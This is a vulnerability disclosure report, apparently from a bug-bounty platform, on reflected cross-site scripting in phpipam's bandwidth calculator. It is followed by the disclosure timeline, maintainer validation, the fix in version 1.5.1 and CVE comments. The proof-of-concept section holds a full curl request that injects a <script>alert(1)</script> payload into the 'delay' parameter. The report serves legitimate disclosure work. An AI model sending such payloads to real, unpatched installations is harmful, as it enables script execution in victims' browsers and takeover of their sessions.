Cross Site Scripting (XSS) Reflected in phpipam/phpipam

Valid

Reported on

Nov 1st 2022


Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

1. i open this page localhost/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator
2. and i analysis code line 41-45 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. next i tried with burpsuite to intercept and then change the value of some parameters such as wsize, delay and fsize on line 13-15 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/ bw-calculator-result.php with <script>alert(1)</script> payload
4. and i trigger payload xss reflected <script>alert(1)</script>
//PoC
curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
    --data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
    $'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

  • Perform any action within the application that the user can perform.
  • View any information that the user is able to view.
  • Modify any information that the user is able to modify.
  • Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
We are processing your report and will contact the phpipam team within 24 hours. 6 months ago
ZenalArifin modified the report
6 months ago
ZenalArifin modified the report
6 months ago
We have contacted a member of the phpipam team and are waiting to hear back 6 months ago
We have sent a follow up to the phpipam team. We will try again in 7 days. 6 months ago
We have sent a second follow up to the phpipam team. We will try again in 10 days. 6 months ago
We have sent a third and final follow up to the phpipam team. This report is now considered stale. 6 months ago
garyallan validated this vulnerability 5 months ago

Thanks for reporting

ZenalArifin has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
garyallan marked this as fixed in 1.5.1 with commit 94ec73 5 months ago
garyallan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 4th 2022
ZenalArifin
5 months ago

Researcher


thanks @garyallan for my first CVE <3

ZenalArifin
3 months ago

Researcher


hello @garyallan any update ?

ZenalArifin
3 months ago

Researcher


Hello. The CVE for this Vulnerability hast Not Bern published. When will you publish IT ?

garyallan published this vulnerability 3 months ago
to join this conversation